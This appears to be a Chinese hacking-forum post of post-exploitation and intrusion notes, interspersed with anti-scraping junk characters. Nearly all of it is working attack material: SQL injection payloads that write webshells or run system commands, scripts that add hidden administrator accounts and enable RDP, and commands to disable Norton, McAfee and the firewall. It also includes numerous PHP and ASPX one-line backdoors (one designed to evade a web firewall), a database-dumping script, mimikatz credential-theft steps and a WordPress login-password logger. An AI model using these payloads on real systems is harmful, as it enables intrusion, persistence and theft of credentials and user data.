SELECT password_hash FROM sys.sql_logins where name='sa'9 L1 H3 O5 Z3 }! U2 }
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
. X( L* L+ i6 B! ?3 m9 W0 y! v; v: Q& Xaccess中导出shell
  h- M% L) b1 t; F  ]
, m& F* V1 f! z0 b: G) @# [中文版本操作系统中针对mysql添加用户完整代码:
1 |, C2 S  ^6 e$ w8 g* f+ m. M% a# y4 {! I
use test;
. Z) A8 o- T# o8 Zcreate table a (cmd text);, r. W( M# ?3 `
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
' n! M. W4 z' Oinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );* u- `4 q! n7 L1 |$ ?* F7 Y
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
& G5 _1 c# h* i0 J5 uselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
; d0 d" I7 O) I* P" w* odrop table a;. X! B( U' z' x& J9 u, m4 e
% G/ n# T) V% F4 ^& e
英文版本:! f' E1 `0 F* Z  D1 H, K( T

) n! n$ g. O7 W  I( Duse test;
% B6 ?! d8 x; @- N/ gcreate table a (cmd text);
+ ~: ~& b) v, p0 n( C) V" i5 ^insert into a values ("set wshshell=createobject (""wscript.shell"") " );
/ J7 s( M; q* `+ b0 Ginsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
; `+ r4 C; Y& ?insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
3 R0 ~- c9 ]3 P: Fselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
+ i8 B' u% j' u( d2 ^  v4 }drop table a;+ a, y& X3 B+ I) G
* S( N  G% E$ W8 Q8 ?6 n7 Z# @
create table a (cmd BLOB);
9 \0 f% \5 F# E. V/ f2 r8 j" x: }insert into a values (CONVERT(木马的16进制代码,CHAR));
) T9 F5 a8 v& W; Z# g! yselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'& F9 s: n5 |3 g/ h
drop table a;% n9 X) e4 l% z0 k* h% X8 v" w

" r' f2 |, ]+ |) Y' a' Z7 G- w记录一下怎么处理变态诺顿
9 l7 S; y8 J2 a9 q查看诺顿服务的路径9 D9 g8 Z" @' P* c4 k1 \
sc qc ccSetMgr
- `1 F. q/ g9 o( ^' p0 B, w然后设置权限拒绝访问。做绝一点。。8 ?# _; r" M0 j( Z5 w! D
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
5 ^; N. D; g# g9 M9 L& O: n  Zcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
2 h( t; r1 Z; ~8 J+ ^+ Jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
1 i) M; m+ a7 V7 R' c0 R4 Gcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone( G( W) ~+ o- L2 o9 `6 d) B
  e- G* E* f1 G2 k1 i% R) u2 C
然后再重启服务器
- c5 |  G) y8 W7 B" c+ tiisreset /reboot  `- g0 S! z: C+ Q
这样就搞定了。。不过完事后。记得恢复权限。。。。% @. M4 o, B2 c' \; C  W
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
- n6 {- d# \, q+ Z% }. r) Zcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F0 C6 c. ]- n3 g2 Z+ @
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
: e3 Y. u9 ~2 g. K5 f7 w$ scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F1 s, U' l9 I$ ?- \( G9 d
SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
* n- ^5 D+ a( O% M) d
0 j4 q+ |% y: {: R! pEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')9 U# u  c; }5 ]
9 r/ ?5 x: u4 j* O$ J$ `  W: ]1 d
postgresql注射的一些东西
. Y. |" Z; `$ J/ F, S如何获得webshell3 N. f  L/ O4 ?9 b+ `
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
( j- ?) e, J7 J: F- Y$ H- p! lhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
1 J8 t4 f1 W, Z$ m" yhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
# m2 o+ L& ?7 C3 V  H* R  \$ i如何读文件( q' D# B% T3 k- {
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);: i$ \# t: g/ ]2 W! b$ _7 |
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
( H5 {$ }  {' F" M, C/ Dhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
, p0 O7 k7 s- W7 a0 V
+ F" Z) A- I4 D3 }3 C. Bz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。  H& G* v+ Y/ |/ H
当然,这些的postgresql的数据库版本必须大于8.X/ p  u5 J4 c. u( F
创建一个system的函数:
3 _* p& J+ J9 I5 N$ b5 @CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT* H1 Y; v/ l- Z- X+ e- Z' m: V
: I/ P$ ?$ a) v8 o, @" s
创建一个输出表:
* Z4 Q  r* r# QCREATE TABLE stdout(id serial, system_out text)! e- _" p( I: o+ j* ?  t4 {

6 ~5 A2 S) K; t$ J% d' q  U执行shell,输出到输出表内:
0 n# Q' ]7 _4 J1 h$ x' t; {3 ^& lSELECT system('uname -a > /tmp/test')9 }! U+ m" @  ]1 F9 c$ H

* K" |0 b$ v  D. u4 bcopy 输出的内容到表里面;
9 W# h0 q6 q; G' DCOPY stdout(system_out) FROM '/tmp/test'
7 o2 g5 L3 e8 v3 T1 B2 Y2 M8 H! V( j8 q; A$ ?
从输出表内读取执行后的回显,判断是否执行成功
5 r, i: s( @# i( s1 |4 q
" u. f' Y: R: Q2 Q" Z0 \8 t5 ZSELECT system_out FROM stdout% l% u" C' q6 }* [; k: o
下面是测试例子7 ~6 d! D7 o5 o
3 D' B; L5 z4 `# E
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
1 M4 `2 p) E9 V/ I+ i
6 a  @. L! E( r5 H8 Q/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
! ^/ P+ m% H* g9 Y' k7 @STRICT --/ z' R* W' `. l; I& D4 C. C; v

' P( u9 p/ F8 ]/ K+ [/store.php?id=1; SELECT system('uname -a > /tmp/test') --- e# b7 U, N2 _
3 z3 A! Y  Q: l- z/ W
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --: @& y! x- c1 {2 F* D- x7 z: f

1 c0 W6 i2 @6 M5 b  }8 M0 S/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--$ D) X5 z- z, k* T7 ]8 r) H$ j4 U0 g
net stop sharedaccess    stop the default firewall0 w' H: g- v) V/ w" Z5 b9 _
netsh firewall show      show/config default firewall. Z) o- ?. D& i4 q9 |
netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
3 v2 N  H* U' \, ?0 pnetsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall- x3 u9 P6 S: n" B' e" k, i0 O+ F
修改3389端口方法(修改后不易被扫出)
4 v8 y& e. ~( r  O修改服务器端的端口设置,注册表有2个地方需要修改1 m; ?' n  g8 l
* i5 [& c% O/ `2 t# K
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
1 H- T# }) B" }% \PortNumber值,默认是3389,修改成所希望的端口,比如6000
2 N& C( J/ y+ S+ [. h  }: ^# [" t. [
第二个地方:
, E. m; A7 Y$ j8 E[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] : y8 Y( k/ x( A0 v' H: p" n! k
PortNumber值,默认是3389,修改成所希望的端口,比如6000
4 R: t* S4 H* M# {# y$ I
8 t: ?* M3 L; p$ ]现在这样就可以了。重启系统就可以了
$ R5 A8 @9 o3 M8 Y
9 L: Q3 I1 F  ^查看3389远程登录的脚本
2 Y+ r# Y6 J4 t- {* z/ C保存为一个bat文件8 s+ m; v4 z- \+ o
date /t >>D:\sec\TSlog\ts.log
2 w( @2 n5 N7 q2 Z: ~& m/ Wtime /t >>D:\sec\TSlog\ts.log
  A6 v2 h) B/ J; P; Knetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
+ d- q% u7 K# s3 y# S+ F8 ]2 |start Explorer
6 e+ r: X, l, s$ e0 _7 P' p$ A! D* v6 x9 ?5 z! N
mstsc的参数:) J" Y" i" ?' l: z* M
" x0 S( d% M% q; g! p* ]
远程桌面连接1 s2 C. x8 c$ `8 ~! O3 `8 \& i4 g
0 m' q; S+ J2 p& L
MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
8 L& v/ _$ S+ @- W$ C5 i( s  E  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?* y5 }  l0 C5 {0 W

: c) x2 A) c  D+ y<Connection File> -- 指定连接的 .rdp 文件的名称。& ~2 t0 Z0 \# z0 Z* M# a  o, f
# P. W$ G4 q$ {* B( O4 H5 L
/v:<server[:port]> -- 指定要连接到的终端服务器。
" L* J, w* y8 \8 N2 v% r& }/ C- `8 x( X5 k; w- v
/console -- 连接到服务器的控制台会话。$ i5 \) s  J& t' f$ c

1 E* k5 t2 O( f/f -- 以全屏模式启动客户端。
1 {8 Q( @7 o; ^7 f7 w/ o' V
! l% \3 i9 D: m; {# r  z# \0 I, A/w:<width> --  指定远程桌面屏幕的宽度。6 L2 x- y3 |: P
' y: @, d; M) T0 d7 P
/h:<height> -- 指定远程桌面屏幕的高度。" B7 z" g6 i* [' S

. y! x- s4 r/ {/edit -- 打开指定的 .rdp 文件来编辑。
4 x& d  O9 a* ]: ?- g" T$ e
/ N- r7 H" e, ]+ W& s6 `/migrate -- 将客户端连接管理器创建的旧版
  Z1 I* T4 m; l+ ~6 A1 }5 ?7 o连接文件迁移到新的 .rdp 连接文件。, |! ~! y+ n$ I6 m1 I
. N+ v9 c6 A1 K
5 I) z5 s* x; ]3 Q/ V
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
2 @) a/ t; N# [) Q. [' emstsc /console /v:124.42.126.xxx 突破终端访问限制数量& \. K; V$ I2 K; M
- U/ F6 x* f  @3 [( r8 `
命令行下开启3389( [3 i/ L6 A8 l2 l0 n6 k. p) i* M  \+ p& Q
net user asp.net aspnet /add' Z! g4 U  c1 g! D
net localgroup Administrators asp.net /add1 g- {5 B: b/ }2 C: m/ ~( e
net localgroup "Remote Desktop Users" asp.net /add( k  Z5 q* B$ t; G
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
8 x$ g5 Q3 l$ h. W$ ?echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
& B* M4 B/ Q) l; ?  h9 R! Hecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
* Y* ]8 c  _* @# Eecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
3 ^, v4 R4 ^/ O9 z& Y2 p8 Zsc config rasman start= auto6 H" `7 ]" b: d9 i6 |* E$ k) H
sc config remoteaccess start= auto
! V# o" V  M" h4 Z2 F* H3 Onet start rasman9 B2 S+ i5 G5 b+ g9 S
net start remoteaccess, p. q' j. X& L
Media
9 ?2 j' r- F' p( @7 C6 o: M<form id="frmUpload" enctype="multipart/form-data"
. O8 U) B$ `3 \9 f% N# Z( kaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>1 K: [& T- v) p5 S
<input type="file" name="NewFile" size="50"><br>
) \1 d2 E( n* X$ g% q' W  g<input id="btnUpload" type="submit" value="Upload">* s% r8 Y; C) g0 g, `+ M) m
</form>- n' ^$ d1 H, @5 k& P

5 a% j( Q; x+ E5 ?control userpasswords2 查看用户的密码
# y: ~2 s. ]6 A& ~access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径0 X7 y( ^7 Q1 h4 @
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
- E" s( h3 A/ F8 q  Y: z' F# D6 G8 u' w6 K" b0 E
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
7 t) i( A# h% X& ]! n测试1:! d* {# h( L5 }" i  W: W0 o2 i
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1. O  o6 o! J* j9 z$ X4 _% |. n

/ i+ u4 W, n# `9 l2 Q测试2:) f1 K% h9 m, E
$ B% j) Y7 _+ X: a$ [# }& U# l
create table dirs(paths varchar(100),paths1 varchar(100), id int)
- F6 Q+ W$ b/ w$ E! S, l- j2 x7 I' R
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
0 j# I0 r/ F: ], r3 f! r6 D, v6 K' v1 @
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t10 \% d7 \. l6 [1 |
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
; ]5 M$ Y5 y# J0 R  b可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
5 M& x6 I2 p- g/ B6 p7 ?: F% ^  [. Bnet stop mcafeeframework
; }1 y; g( g' c5 Q5 h% E# G( Ynet stop mcshield! j9 k/ s. ~# B% {" _
net stop mcafeeengineservice# q! Q7 u+ z3 F1 U
net stop mctaskmanager& @2 T, e6 O" T, S9 R0 w; `, h
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D5 `: q. M8 o" O+ h1 Y  {2 A

0 J$ o' L/ R( `& I) T  VNCDump.zip (4.76 KB, 下载次数: 1) ' k) n6 ~, I1 i8 C0 ]) c! Z3 T
密码在线破解http://tools88.com/safe/vnc.php
1 N6 I- L  Q# y) ?; Q; wVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取% O" \; u! b5 d! h/ R! V8 w$ h

  F/ B. ~( t% v) }exec master..xp_cmdshell 'net user'
  O) j% V$ [6 m, [5 u2 wmssql执行命令。
/ `3 A' Q5 m0 |" T, {获取mssql的密码hash查询. W  V" O9 I% r5 d
select name,password from master.dbo.sysxlogins" r6 L* q: R, h# G. z5 \% H' q

( h7 F% j. ]" h5 sbackup log dbName with NO_LOG;
& g# F8 O& P5 h# T0 c  Obackup log dbName with TRUNCATE_ONLY;
& V0 a; E: k: _4 RDBCC SHRINKDATABASE(dbName);% N2 R' T8 E& w8 A
mssql数据库压缩# o( }7 V9 B3 _( Z8 f- F

; E2 n, }$ i' ^( _' x( K) r5 l' IRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK4 c$ n9 ^$ B: t+ `$ w
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
( O9 \" y: Q- m6 ~" {% z' M& a* \6 \% e' R) z
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'  s, _8 E* [# q; `/ L6 `4 b
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
* A9 g3 F$ }. _6 K! I5 U8 p# W4 }* W+ J( x) U
Discuz!nt35渗透要点:
9 j% Y4 \+ ]9 u" _; X& W5 N(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
8 B5 `$ w3 ~, h% N0 l(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
% N/ q/ a: g) c7 Z(3)保存。9 @$ q2 ^& a& ]; O9 f9 `
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
) E2 `+ w2 i' x" o* U& \: i" xd:\rar.exe a -r d:\1.rar d:\website\
3 k4 c# k: ]4 L0 \2 `5 C/ y递归压缩website
  @9 V+ [8 j, h注意rar.exe的路径
. N5 K' F4 J: b" y! p# R! J$ o) M- _& ?' Z
<?php
" s! ]8 o& i& F0 h5 f% `8 p. @8 t$ f8 C# q' R. T: b& W5 X+ w
$telok   = "0${@eval($_POST[xxoo])}";
2 d$ T! _$ B9 }" W+ v, r) a- J  z9 j( g8 t
$username   = "123456";% q; q' F& \1 J+ o
; e6 N7 e4 u4 H; z8 t+ @; p- O6 \
$userpwd   = "123456";" ?" o8 w! R8 L
: i3 _4 C/ N3 k- r: s8 T% p
$telhao   = "123456";
9 U) m1 f- F4 Z, M& T$ _' P/ E5 Q. `6 L  \
$telinfo   = "123456";
' t2 H$ A! ~- g; y) r  m1 g% Q9 Y' c. ^. |: ?' B8 d1 ?4 ~4 g
?>0 ?# _1 l- X, ]! H
php一句话未过滤插入一句话木马
% m5 u8 t- X8 c9 O( D/ _, W
  n% f) y/ u/ ?# j& A: U& M4 \站库分离脱裤技巧* d' [! Q6 O/ C- l; {& N1 @
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
) W1 c) a  I" Q6 r4 K" z" Mexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
( ?7 ]/ ~) _1 ]1 r( v: Y6 m条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
; k+ H$ l: K$ |  y7 P0 {这儿利用的是马儿的专家模式(自己写代码)。
5 _. j& u7 A7 I* j( W7 k6 Q+ xini_set('display_errors', 1);
4 C1 q- a; H9 l* {+ J5 Yset_time_limit(0);: t! _: O$ g) m0 i  Q
error_reporting(E_ALL);! T4 v+ i6 {' F8 v- R, \- m
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
/ ]# w8 f$ t2 Wmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
$ Z+ D% A, T+ z& C5 ^$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());* n7 K; {2 x" E( f  f
$i = 0;9 ]/ _- L3 N$ z. R
$tmp = '';0 L$ B  O$ ?. R3 O' `
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
1 z) I0 z: g' y5 a    $i = $i+1;
8 b  S2 B# e) Q* C, [7 p    $tmp .=  implode("::", $row)."\n";8 ~6 P+ l+ {- X, g3 Q5 t! f
    if(!($i%500)){//500条写入一个文件
  ^9 J, l* x) y' E9 m7 F* F0 ?        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
) [- E. }( D7 z3 y$ Y        file_put_contents($filename,$tmp);, e( V3 }/ p" Z1 ~9 b6 c. y
        $tmp = '';+ \0 {1 P: g  K1 n* X( L
    }
) L7 l" [. o! K0 O4 T' _8 Z; q: y" u}
  c3 ~& q# S. G" Pmysql_free_result($result);; |; c( f, N" |$ m# u2 d3 i- S
: L& q" N1 J8 i$ D' a3 |7 P' `

; k/ V0 F, \: \
# p9 a+ L+ }: w: r//down完后delete: T! Z% i# A, c; a) k( k/ S4 o

' D* v# {( z; d! J: m8 J% |! i* T+ O$ W) P: i0 S1 ~2 U, x
ini_set('display_errors', 1);
7 H3 d/ h: S  R- T* @3 T  Qerror_reporting(E_ALL);
$ R+ ~5 \1 c& T9 y$i = 0;
7 l, A! [* S7 c: Gwhile($i<32) {3 k: {: r! h1 W. Z# v: H" b
    $i = $i+1;( o3 }6 G" O% z, \1 {$ d
        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';0 Y: u; s* I" R  V0 t) a' d  W4 w
        unlink($filename);. A0 S7 L( d0 U; n8 ~
} 4 R1 k' m: U7 v  S0 |, z
httprint 收集操作系统指纹, r* n( i2 r1 g: V
扫描192.168.1.100的所有端口
9 y7 k2 H3 H0 P" _; b! Q) X* f6 @nmap –PN –sT –sV –p0-65535 192.168.1.1002 P+ r* J: W7 a8 d4 x9 ~
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
5 r. A0 `* \9 X! E- f) whost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
8 A+ i+ P% @* _& @+ cNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
/ y1 {8 t0 ?" Q' B: I& t3 ?, \2 j/ A8 Q* O5 Q; k7 v# P3 ^
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
. o( O1 F, e3 ?" o! @2 g# N5 U6 f* J
7 ^/ Q. B4 w3 w( W& ]7 U  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)# h& o, \5 X9 T4 [. m, w. p8 {' q8 G& N

* r" k7 g& d8 M5 n8 t7 J+ |  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
* h( ~1 k8 u6 E% n4 {
) n$ ]! i3 }: s1 l: u* U4 G( s  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)5 v0 `4 V6 G+ `! s
& l( e9 `( t; H' [! U3 X
  http://net-square.com/msnpawn/index.shtml (要求安装)% r9 P$ J' G$ [8 s* y$ I* {* ^& U
( |! K% F* X: n+ p8 o
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)7 ~8 m: H5 p* [8 A; N

" h& Q/ N' [) D6 ^  }0 ?  z  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
( i% B# s  J# d0 [* ]/ z! \set names gb2312
3 d8 C. ~: k. ^3 T$ g导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。# V" I$ k2 H, n

, B5 P* }! ]* X" Ymysql 密码修改6 v( g: X; y' z4 l6 m
UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ” 6 p+ G- m+ t/ M( i
update user set password=PASSWORD('antian365.com') where user='root';
# a4 x- R* K6 d" N5 }flush privileges;
2 N* y8 E0 R9 \$ s- p9 v: i; g高级的PHP一句话木马后门
5 R- l' r4 B9 @3 F, F1 Z  A9 k2 f8 k2 Z2 L' F* L* W- B
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀" ?9 ]7 m  p( k* i' ]+ {+ j
$ x) Y" y: l: W6 |& {4 t
1、) [2 z# U* A! e
! v( A3 l( ^+ |& }4 r
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
# k: L7 O. b3 {) w1 \2 M' w9 K* I( |* ^/ M! ?# s
$hh("/[discuz]/e",$_POST['h'],"Access");
3 K. O8 s/ q  l9 e9 G0 Y# v4 R2 W  D
//菜刀一句话4 K' d+ X- S+ g6 @* _3 c4 j$ E

( p+ v( L' M8 s/ h) d- q7 I! |2、# d% y; ~! J3 j- T
. B5 k6 N5 g2 p' L
$filename=$_GET['xbid'];
3 B" E7 J, e8 T$ a& [( H3 v5 X, R5 j$ G! U
include ($filename);
% |1 i8 @' Y% c- B/ f4 z6 j/ R# ?. r: y" D+ y/ }8 f; ?( u: C
//危险的include函数,直接编译任何文件为php格式运行1 N4 U6 D0 F6 u% j% }* g
, i& G5 C2 e( @2 r
3、
3 R8 @& O# @5 _/ E  P9 H2 h, a
& o+ o+ c+ c2 \+ {  s) d4 B$reg="c"."o"."p"."y";
6 K9 E, {0 X2 g4 m) }' d# H2 Z0 O
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);" C1 o" n9 R  S1 v- Q
5 F8 i# l( Z. U, k6 |1 l) r4 {
//重命名任何文件; l5 I; h/ T) C0 Z& C8 m
- F/ U* G; N- U: ?. x- P
4、
- ]2 V, B, F6 Q- z7 c8 d2 x: F7 f0 l2 c9 ^! I
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
- C* k2 A* L# p, c2 A* k7 |# `: {% w' C" v0 q5 K$ @; X6 y  p
$gzid("/[discuz]/e",$_POST['h'],"Access");
) F. w  G5 J, O9 J
& C2 _$ Y2 G  S& N//菜刀一句话
" D+ v. Y( x, S7 w% H! q6 c
1 E! N: Q2 I1 N3 O5、include ($uid);
. C( f4 [& S: h6 x4 y: u
: \1 d  ]1 `+ U9 |( [7 ?) `//危险的include函数,直接编译任何文件为php格式运行,POST
6 u. d9 t+ `; o! l" B9 f: Q$ ^8 C' T' h8 ]+ T1 L+ O* V
; N* R0 I6 t5 t- ~! }
//gif插一句话
0 s9 r" \1 S5 Z  a
* |: s9 W$ G* [6、典型一句话" A+ H/ k8 Z3 ~

0 T1 |: K6 L/ f9 f: ~" T; f程序后门代码3 ]9 B, w, `. a. M( V
<?php eval_r($_POST[sb])?>9 M7 l. D4 G; G/ B  n# u# [
程序代码
6 x0 t' l( u. d; Y# E. @" ?% J<?php @eval_r($_POST[sb])?>
6 H5 c' c/ b* x, x5 p' J//容错代码) N$ h( }" I. I
程序代码/ x- N) x) `2 `8 l4 _8 o! i4 {
<?php assert($_POST[sb]);?>. C  \  G! u( b4 a" `0 A
//使用lanker一句话客户端的专家模式执行相关的php语句
6 {, _) O# T+ @$ O* b6 ]程序代码/ x  g1 V" G  [/ T6 ^8 G
<?$_POST['sa']($_POST['sb']);?>, {4 _" x, {4 w
程序代码8 d' f; _) `# N. Z1 J1 E3 q
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
& C! q2 L+ _2 F程序代码# S8 H' c2 Z/ q' F+ r( R! A
<?php3 w3 C  _/ b( r; h) T- {
@preg_replace("/[email]/e",$_POST['h'],"error");$ n: _: Y4 a! e$ W4 S3 x
?>2 Y& j% E  @# S( ~  `  S$ M
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
9 R; C7 q2 G' j程序代码
9 b5 |# `" z4 h; _  V<O>h=@eval_r($_POST[c]);</O>. p9 ]3 |1 C2 b  P
程序代码3 i9 ?" N0 M$ a; i& @1 M! W
<script language="php">@eval_r($_POST[sb])</script>% o) [3 k* n( ]+ Z0 J' p& i0 A! b
//绕过<?限制的一句话
+ F( Q( v' O% F/ B6 q: A/ G! K: H5 I7 ~$ `- Y; T; Z. B1 F; r1 z' K$ C
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
' s# S5 P& ~9 r9 G8 s% y详细用法:
* N- b  F" W( [, E/ Y4 q1、到tools目录。psexec \\127.0.0.1 cmd
( y/ k/ f2 z3 V0 u) y" h: l2、执行mimikatz# r' }, O* t* I+ K
3、执行 privilege::debug
3 S9 j" O# n+ H  k  F2 V! Y4、执行 inject::process lsass.exe sekurlsa.dll
! L( f% b7 O3 T9 g8 w5、执行@getLogonPasswords% b# V/ ^# h+ @  @: \( T
6、widget就是密码
4 [% I9 r( K0 Z0 w! _7、exit退出,不要直接关闭否则系统会崩溃。
9 O$ R: q" `  Y$ q) i4 I' t2 j
# {9 x) R! \% |4 `% {2 z2 W! Thttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面" w. f: N% F4 c& C1 P0 L
2 P) j: T: q% O
自动查找系统高危补丁& r6 H% f* U3 G" M/ P1 Q; T
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
. \' l9 v+ P" u0 |; t% V" T
; _" h$ `4 K% h  K) r- }1 f突破安全狗的一句话aspx后门  O% o$ h: b0 p, f, ?; Y
<%@ Page Language="C#" ValidateRequest="false" %>& H5 y0 \: E: g8 e9 c
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
" o% `0 ~0 S6 kwebshell下记录WordPress登陆密码8 @* l- V  N' K: f- N. j% {( ?* @( m
webshell下记录Wordpress登陆密码方便进一步社工5 B# i8 b* K3 v$ V0 S/ y
在文件wp-login.php中539行处添加:
3 T' L2 g6 p+ w// log password. Y8 k0 p9 ?3 c! t
$log_user=$_POST['log'];* T! n" v) _. p5 \& e- l0 e
$log_pwd=$_POST['pwd'];
" _" p* H6 S. S7 k; t$log_ip=$_SERVER["REMOTE_ADDR"];+ Z) R* G7 m+ N1 \* B' @
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
0 |4 r/ [* `( z# y- W, K$txt=$txt.”\r\n”;( M4 a* ~! J% Q
